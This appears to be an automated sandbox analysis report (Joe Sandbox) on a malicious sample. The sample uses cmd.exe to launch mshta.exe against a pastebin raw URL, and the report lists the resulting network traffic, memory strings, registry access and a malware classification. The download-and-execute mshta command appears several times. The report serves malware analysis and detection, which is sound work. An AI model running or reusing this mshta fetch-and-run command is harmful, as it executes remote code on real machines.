Source: Process started | Author: Joe Security: Data: Command: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, CommandLine: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6360, ProcessCommandLine: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, ProcessId: 6416 |
Source: unknown | HTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49707 version: TLS 1.2 |
Source: unknown | DNS query: name: pastebin.com |
Source: global traffic | HTTP traffic detected:
    GET /raw/i5mSzahw HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: pastebin.com
    Connection: Keep-Alive |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 104.23.98.190 |
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com |
Source: mshta.exe, 00000002.00000002.478902815.00000000053AC000.00000004.00000001.sdmp | String found in binary or memory: http://pastebin.com/raw/i5mSzahw |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/? |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8 |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers? |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/ |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn |
Source: mshta.exe, 00000002.00000002.478902815.00000000053AC000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/i5mSzahw |
Source: unknown | DNS traffic detected: queries for: clientconfig.passport.net |
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE |
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw' | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mshta.exe c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw | |
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_01 |
Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\i5mSzahw[1] |
Source: classification engine | Classification label: mal52.troj.evad.win@4/1@2/1 |
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: C:\Windows\SysWOW64\mshta.exe | Code function: 2_2_06D6E215 pushfd ; retf | 2_2_06D6E21B |
Source: C:\Windows\SysWOW64\mshta.exe | Code function: 2_2_06D6F772 push 06D6F7B0h; retf | 2_2_06D6F784 |
Source: C:\Windows\SysWOW64\mshta.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX |
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp | Binary or memory string: Program Manager |
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd |
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp | Binary or memory string: Progman |
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp | Binary or memory string: Progmanlock |
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation |